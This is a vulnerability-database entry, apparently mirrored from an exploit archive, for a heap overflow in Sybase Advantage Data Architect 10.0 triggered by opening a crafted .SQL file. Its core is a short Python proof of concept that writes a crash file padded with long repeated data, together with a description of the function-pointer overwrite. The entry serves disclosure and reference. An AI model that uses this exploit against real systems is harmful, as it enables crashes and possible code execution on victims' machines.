Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sybase Advantage Data Architect - "*.SQL" Format Heap Oveflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 18 Views

Sybase Advantage Data Architect SQL Format Heap Overflow allows remote code execution. The issue occurs when a crafted .SQL file with long data is opened, resulting in a function pointer overwrite, enabling execution of arbitrary code

Code

                                                # Exploit Title: Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow RCE
# Date: 2010-10-16
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.sybase.com/products/databasemanagement/advantagedatabaseserver/data-architect-utility
# Version: 10.0
# Tested on: Windows XP SP3 32 bits SPA
#Summary:
"""
From Sybase.com:
"Advantage Data Architect Utility: A complete data management system for Advantage developers.
Advantage Data Architect assists in designing, creating and maintaining the database layer of 
a developer's applications."

Advantage Data Architect is prone to heap overflow when user opens crafted script file (.SQL) 
with long data inside.
This issue causes a function pointer overwrite, allow us executing arbitrary code (UNICODE).
More info can be found on : http://elotrolad0.blogspot.com/2010/11/sybase-advantage-data-architect-sql.html
"""
EDB Admin comment:
opening the crash file alone is not enough. Once the file is open, type anything in the SQL query window and the crash will occur.
Thx d0lc3 for the clarification. 
"""

#!/usr/bin/python

sql="select * from clients where "
buf="A"*(1024*300)

crash=sql+buf+"="+buf

f=open("crash.sql",'w')
f.write(crash)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
sybase advantage data architectsqlheap overflowremote code executioncrafted script filefunction pointer overwritearbitrary codevulnerabilityexploit
18